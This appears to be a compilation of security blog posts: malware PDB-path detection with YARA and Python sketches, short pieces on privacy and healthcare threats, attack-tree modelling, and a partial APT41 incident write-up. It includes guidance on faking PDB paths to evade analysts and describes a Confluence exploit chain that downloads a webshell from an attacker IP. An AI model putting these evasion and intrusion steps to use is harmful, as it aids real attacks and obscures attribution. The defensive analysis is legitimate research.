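    has_separator = b"\\" in path or b"/" in path
    is_unc = path.startswith(b"\\\\")  # \\host\share style network path
    if has_separator and not is_unc and not _DRIVE.match(path):
        issues.append("no drive letter")
    if b"/" in path:
        issues.append("forward slashes")
    if any(b < 0x20 or b == 0x7F for b in path):
        issues.append("control characters")
    if any(b > 0x7F for b in path):
        issues.append("non-ASCII bytes")
    return issues
```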

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb


Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:


Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.


We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry joke that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a spaghetti-code mess of scripts and signatures, which is absolutely how this started.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on GitHub being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy about putting full code packages right into the repositories, and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, a considerable intelligence gain about the malware’s original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on GitHub. But there are other occasions too: sometimes malware source code is inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes it is left in open directories; and sometimes it is uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2 {
    meta:
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
}
rule PDB_Header_V7 {
    meta:
        description = "This looks for PDB files based on headers."
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}
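The same header check can be run over archive contents in Python. The sketch below reuses the two header prefixes from the rules above and assumes ZIP archives held in memory as bytes; other archive formats would need their own readers, and `pdb_header_version` and `pdb_members_in_zip` are hypothetical names.

```python
import io
import zipfile
from typing import List, Optional

# Header prefixes taken from the two Yara rules above.
PDB_HEADERS = {
    b"Microsoft C/C++ program database 2.00\r\n": "PDB 2.00",
    b"Microsoft C/C++ MSF 7.00": "PDB 7.00 (MSF)",
}


def pdb_header_version(data: bytes) -> Optional[str]:
    """Return the PDB format name if data starts with a known header."""
    for magic, name in PDB_HEADERS.items():
        if data.startswith(magic):
            return name
    return None


def pdb_members_in_zip(archive: bytes) -> List[str]:
    """List members of a ZIP archive (given as bytes) that start with a PDB header."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                if pdb_header_version(member.read(64)) is not None:
                    hits.append(info.filename)
    return hits
```

Pairing a hit with the archive's detection rate or other metadata, as suggested above, keeps the resulting haystack manageable.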

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
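
The CI/CD toolmarks in the paths above are regular enough to check mechanically. The following is a minimal Python sketch, not a FireEye rule. The marker list is a hypothetical set of folder fragments taken from the example paths, and a real rule would need many more entries plus tuning against clean software.

```python
import re

# Hypothetical markers of CI/CD build agents, taken from the example paths above.
# Each entry is a regex fragment; backslashes are escaped for Windows paths.
CI_MARKERS = [
    r"\\jenkins\\workspace\\",
    r"\\bamboo-agent-home\\",
    r"\\bamboo~1\\",           # 8.3 short-name form of a Bamboo folder
    r"\\build-dir\\",
    r"\\build-~1\\",           # apparently the 8.3 short-name form of build-dir
    r"\\teamcity\\buildagent\\",
]
CI_PATTERN = re.compile("|".join(CI_MARKERS), re.IGNORECASE)


def looks_like_ci_build(pdb_path: str) -> bool:
    """Return True if the PDB path contains a known build-agent toolmark."""
    return CI_PATTERN.search(pdb_path) is not None


paths = [
    r"D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb",
    r"C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb",
    r"c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb",
]
for p in paths:
    print(looks_like_ci_build(p), p)
```

Note that the KScan.pdb rootkit path matches too, which is the point made above: a build-server toolmark is a weak signal about the development environment, not a verdict on the file.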

Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio menu bar, select Project > Properties, then in the side pane select Linker > Debugging and fill in the “Generate Program Database File” option box. This option accepts Visual Studio macros, so there is plenty of flexibility for scripting and creating custom build configurations that falsify or randomize PDB paths.

Figure 18: hellol project Properties showing defaults for the PDB path

Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw hellol.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Alternatively, when building at the command line, you could pass the /PDBALTPATH linker option, which creates a PDB file name that does not rely on the file structure of the build computer.

Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable
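
To see the same artifact programmatically, here is a minimal Python sketch that pulls PDB paths out of CodeView “RSDS” records (the CV_INFO_PDB70 layout that modern Microsoft linkers emit). It assumes the standard record layout (4-byte signature, 16-byte GUID, 4-byte age, then a NUL-terminated path) and simply scans the raw bytes for the signature; a production parser would walk the PE debug directory rather than search the whole file.

```python
import struct
import uuid
from typing import List, Tuple

RSDS_MAGIC = b"RSDS"


def parse_rsds(record: bytes) -> Tuple[uuid.UUID, int, str]:
    """Parse a CodeView RSDS record: 'RSDS', 16-byte GUID, uint32 age, NUL-terminated path."""
    if len(record) < 24 or record[:4] != RSDS_MAGIC:
        raise ValueError("not an RSDS CodeView record")
    guid = uuid.UUID(bytes_le=record[4:20])       # GUID is stored in Windows (little-endian) layout
    (age,) = struct.unpack_from("<I", record, 20)
    end = record.find(b"\x00", 24)
    raw_path = record[24:] if end == -1 else record[24:end]
    # Decode leniently so triage does not crash on unexpected bytes in the path.
    return guid, age, raw_path.decode("utf-8", errors="replace")


def find_pdb_paths(data: bytes) -> List[str]:
    """Naively scan raw file bytes for RSDS records and return their .pdb paths."""
    paths = []
    start = data.find(RSDS_MAGIC)
    while start != -1:
        try:
            _, _, path = parse_rsds(data[start:])
            if path.lower().endswith(".pdb"):
                paths.append(path)
        except ValueError:
            pass  # signature bytes without a complete record; keep scanning
        start = data.find(RSDS_MAGIC, start + 1)
    return paths
```

Reading hellol.exe in binary mode and passing its bytes to find_pdb_paths should return the fake path configured in the linker settings. Because the scan is naive, it can also surface RSDS-looking bytes embedded elsewhere in a file, which for hunting purposes may itself be interesting.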

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to have been compiled on a CI/CD server, which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? Whatever the reason, PDB manipulation is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility of detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.


If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have historically been successful using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely labeled their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, beyond these descriptors of the malware development files and environment, we identified anomalies in PDB paths, when present, that help surface files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.
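
As a rough illustration of what keyword rules over PDB paths look like, here is a Python sketch. It is not the ConventionEngine rule pack itself; the term list is hypothetical, seeded with words used in this post plus two illustrative additions, and each hit is meant as a weak signal rather than a detection on its own.

```python
import re
from typing import List

# Hypothetical term list for illustration; not the ConventionEngine rule pack.
# "rootkit", "trojan", "mimikatz", and "virus" appear in this post; the last two are extra examples.
SUSPICIOUS_TERMS = ["rootkit", "trojan", "mimikatz", "virus", "keylog", "backdoor"]


def pdb_weak_signals(pdb_path: str) -> List[str]:
    """Return every suspicious term that appears in a folder or file name of the path."""
    # Split on Windows and POSIX separators so a term cannot straddle two components.
    components = [part.lower() for part in re.split(r"[\\/]", pdb_path) if part]
    return [term for term in SUSPICIOUS_TERMS
            if any(term in component for component in components)]


print(pdb_weak_signals(
    r"c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb"
))  # ['rootkit']
```

The sketch also shows the scaling problem described above: every useful term has to be found and added by hand, and paths without obvious keywords produce no hits at all.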

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

After “No”

Part of a privacy professional’s job is the development of processes and policies to manage the consent of an individual. When someone does consent to their information being processed, there should be a means to record that they have done so and also a way for that individual to revoke their consent or opt-out of […]

The post After “No” appeared first on Privacy Ref.

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights; in the meantime, here are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While it is difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost than Western firms.
  • Healthcare databases for sale under $2,000: The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Define Your Unique Security Threats with These Tools

For attacks with five or fewer steps, it takes only minutes from the attacker’s first action for an asset to be compromised, according to the 2019 Verizon Data Breach Investigations Report (DBIR). However, it takes an average of 279 days to identify and contain a breach (Ponemon Institute). And the longer it takes to discover the source, the more the incident ends up costing the organization. Luckily, you can reduce your chance of falling victim to these attacks by proactively anticipating your greatest threats and taking measures to mitigate them.

This blog post breaks down two tools to help you determine just that: your most at-risk data, how this data can be accessed, and the attacker’s motives and abilities.  Once you have an understanding of these, it will be much easier to implement countermeasures to protect your organization from those attacks.

I recommend first reading through the DBIR sections pertaining to your industry in order to further your understanding of patterns seen in the principal assets being targeted and the attacker’s motives.  This will assist in understanding how to use the two tools: Method-Opportunity-Motive, by Shari and Charles Pfleeger and Attack Trees, as discussed by Bruce Schneier.

Defining Method-Opportunity-Motive:


Methods are the skills, knowledge, and tools available to the hacker, similar to the Tactics, Techniques, and Procedures (TTPs) used by the military and MITRE. Jose Esteves et al. wrote, “Although it used to be common for hackers to work independently, few of today’s hackers operate alone. They are often part of an organized hacking group, where they are members providing specialized illegal services….” A hacker’s methods are improved when they are part of a team that has a motive and looks for opportunities to attack principal assets.


Opportunities are the amount of time and ability an attacker needs to access their objective. The 2019 DBIR authors note, “Defenders fail to stop short paths substantially more often than long paths.” It’s critical to apply the correct controls to assets and to monitor those controls in order to quickly detect threats.


The motive is the reason to attack; for instance, is the attacker trying to access financial information or intellectual property? The 2019 DBIR notes that most attacks are motivated by financial gain or intellectual property (IP), varying by industry.

Using Attack Trees to Visually Detail Method-Opportunity-Motive:

Bruce Schneier (Schneier on Security) provides an analytical tool for systematically reviewing why and how an attack might occur. After defining which assets are most valuable to an attacker (motive), you can identify the attacker’s objective, referred to as the root node in an attack tree. From here, you can look at all the possible actions an attacker might use to compromise the primary assets (method). The most probable and timely method shows the most likely path (opportunity).

I like using divergent and convergent thinking described by Chris Grivas and Gerard Puccio to discover plausible motive, opportunity, and methods used by a potential threat actor. Divergent thinking is the generation of ideas, using techniques like brainstorming. Convergent thinking is the limiting of ideas based on certain criteria. Using this process, you and your security team can generate objectives and then decide which objectives pose the greatest threat. You can then use this process again to determine the possible methods, referred to as leaf nodes, that could be used to access the objective. Then, you can apply values, such as time, to visualize possible opportunities and attack paths.

To further your understanding of how to create an attack tree, let’s look at an example:

1.  First, decide what primary assets your company has that an intruder is interested in accessing.

The 2019 DBIR provides some useful categories to determine attack patterns within specific industries.  For this example, let’s look at a financial institution. One likely asset that a threat actor is attempting to access is the email server, so this is our root node, or objective. Again, using divergent and convergent thinking can help a team develop and clarify possible objectives.

2.  After deciding on the objective, the second step in developing an attack tree is to define methods to access the objective.

The 2019 DBIR describes some likely methods threat actors might use, or you can use divergent and convergent thinking. In the example below, I’ve included some possible methods to access the email server.

Attack Tree Visualization

3.  As you analyze the threat, continue working through the tree and building out the methods to develop specific paths to the asset.

The diagram below shows some potential paths to access and harvest information from the email server, using OR nodes, which are alternative paths, and AND nodes, which require combined activities to achieve the objective (this is represented using ). Note that every method that isn’t an AND node is an OR node.

Attack Tree Visualization

4.  The fourth step is to apply binary values to decide what paths the attack is most likely to follow.

For example, I’m going to use likely (l) and unlikely (u) based on the methods my research has shown are available to the attacking team. Then, use a dotted line to show all likely paths, which are those in which every method on the path is assigned a likely value.

Attack Tree Visualization
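
The likely/unlikely propagation in step 4 can be expressed as a small recursive evaluation. In this Python sketch, a leaf is likely or unlikely as marked, an OR node is likely if any alternative is, and an AND node is likely only if all of its required activities are. The tree and its (l)/(u) values are hypothetical and are not the ones in the diagrams.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Node:
    name: str
    kind: str = "LEAF"              # "LEAF", "OR", or "AND"
    likely: Optional[bool] = None   # set on leaves only: True = (l), False = (u)
    children: List["Node"] = field(default_factory=list)


def is_likely(node: Node) -> bool:
    """Leaf: as marked. OR: any alternative likely. AND: every required step likely."""
    if node.kind == "LEAF":
        return bool(node.likely)
    results = [is_likely(child) for child in node.children]
    return any(results) if node.kind == "OR" else all(results)


# Hypothetical tree; names and (l)/(u) values are illustrative only.
root = Node("Access email server", "OR", children=[
    Node("Phishing (credential harvesting)", likely=True),
    Node("Stolen credentials", likely=False),
    Node("Exploit mail server", "AND", children=[
        Node("Find unpatched vulnerability", likely=True),
        Node("Bypass network controls", likely=False),
    ]),
])

likely_branches = [child.name for child in root.children if is_likely(child)]
print(likely_branches)  # ['Phishing (credential harvesting)']
```

The AND branch drops out because one of its required steps is marked unlikely, which is exactly the "every method on the path must be likely" rule from step 4.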

5.  The fifth step is to apply numeric values to the sub-nodes to decide on what path, specifically, the threat actor might attempt.

I’m going to use minutes in this scenario; however, other values such as associated costs or probability of success could also be used. These are subjective values and will vary amongst teams. Paths with supporting data would provide a more accurate model, but Attack Trees are still useful even without objective data.

Attack Tree Visualization

In the above example, I have determined the path with the shortest amount of time to be phishing (credential harvesting), assuming the credentials are the same for the user accounts as they are for admin accounts. Since I have already determined that this path is likely and I now know it takes the shortest amount of time, I can determine that this is the most at-risk and likely path to accessing the email server.  In this example, the least likely path is stolen credentials.
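
Step 5’s time values can be rolled up the same way. In this Python sketch, an OR node takes its fastest alternative and an AND node sums its children, which assumes the combined activities happen one after another. The minutes are hypothetical placeholders, not the values in the diagram.

```python
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class TimedNode:
    name: str
    kind: str = "LEAF"       # "LEAF", "OR", or "AND"
    minutes: float = 0.0     # estimate on leaves only (hypothetical values)
    children: List["TimedNode"] = field(default_factory=list)


def cheapest(node: TimedNode) -> Tuple[float, List[str]]:
    """Return (total minutes, leaf steps) for the fastest way to satisfy node."""
    if node.kind == "LEAF":
        return node.minutes, [node.name]
    options = [cheapest(child) for child in node.children]
    if node.kind == "OR":
        # Any one alternative is enough, so take the fastest.
        return min(options, key=lambda option: option[0])
    # AND: every child is required; assume the steps run sequentially.
    total = sum(minutes for minutes, _ in options)
    steps = [step for _, child_steps in options for step in child_steps]
    return total, steps


root = TimedNode("Access email server", "OR", children=[
    TimedNode("Phishing (credential harvesting)", "AND", children=[
        TimedNode("Send phishing email", minutes=10),
        TimedNode("Harvest credentials", minutes=20),
    ]),
    TimedNode("Stolen credentials", minutes=120),
    TimedNode("Exploit mail server", "AND", children=[
        TimedNode("Find unpatched vulnerability", minutes=60),
        TimedNode("Develop exploit", minutes=180),
    ]),
])

print(cheapest(root))  # (30, ['Send phishing email', 'Harvest credentials'])
```

Swapping minutes for cost or probability of success mainly changes how OR and AND combine values (for example, multiplying independent success probabilities under an AND).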

6.  After examining the possible motives, opportunities, and methods, you can decide how you want to protect your assets.

For example, I determined that phishing is likely with the attack tree above, so I might decide to outsource monitoring, detection, and training to a Managed Security Service Provider (MSSP) that can provide this at a lower cost than in-house staff. I might also consider purchasing software to detect, report, and prevent phishing emails, reducing the chance that a phishing attempt succeeds. If social engineering is determined to be a concern, you could conduct end-user training, look for ways to secure the physical environment (guards, better door locks), or make the work environment more desirable (cafeteria, exercise room, recreation area, etc.).

The models discussed work together to provide ways to determine, analyze, and proactively protect against the greatest threats to your valuable assets. Ultimately, thinking through scenarios using these tools will provide a more thoughtful and cost-effective approach to security.

The post Define Your Unique Security Threats with These Tools appeared first on GRA Quantum.

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting them within a matter of days.

Our knowledge of this group’s targets and activities is rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to show not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks, limiting the threat actor’s ability to gain a foothold, and preventing data exposure.


In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.

Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.

Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.
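
On the defensive side, the two request features listed above translate into a simple content check. The following Python sketch is a hypothetical heuristic, not a FireEye signature: it parses an HTTP POST body as JSON and reports whether any _template field points at a remote or file URL and whether a cmd field is present. It searches the whole JSON tree rather than assuming where those fields sit in the request.

```python
import json
from typing import Iterator, Tuple
from urllib.parse import urlparse

# URL schemes treated as suspicious in a template reference (an assumption of this sketch).
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def walk(obj) -> Iterator[Tuple[str, object]]:
    """Yield every (key, value) pair anywhere in a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from walk(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from walk(item)


def inspect_body(body: str) -> Tuple[bool, bool]:
    """Return (remote_template, has_cmd) for an HTTP POST body."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False, False
    remote_template = has_cmd = False
    for key, value in walk(data):
        if key == "_template" and isinstance(value, str):
            if urlparse(value.strip()).scheme.lower() in REMOTE_SCHEMES:
                remote_template = True
        elif key == "cmd":
            has_cmd = True
    return remote_template, has_cmd
```

A remote _template on its own is already unusual; a cmd field alongside it raises confidence considerably.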

Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.
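
The certutil.exe download in this intrusion is a well-known living-off-the-land pattern. The post does not show the exact command line used, so this Python sketch assumes the commonly abused form, certutil’s -urlcache verb combined with an http(s) URL, and flags process command lines that match it.

```python
import re

# Heuristic (an assumption of this sketch): certutil run with its -urlcache verb and
# an http(s) URL on the same command line, the commonly abused download form.
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\b", re.IGNORECASE)
URLCACHE_RE = re.compile(r"[-/]urlcache\b", re.IGNORECASE)
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def is_certutil_download(cmdline: str) -> bool:
    """Flag process command lines that look like certutil being used to fetch a URL."""
    return all(pattern.search(cmdline) for pattern in (CERTUTIL_RE, URLCACHE_RE, URL_RE))


print(is_certutil_download("certutil.exe -urlcache -split -f http://203.0.113.5/a.jsp test.jsp"))
```

Attackers can fetch files with certutil in other ways, so treat this as one rule among several rather than complete coverage.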

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
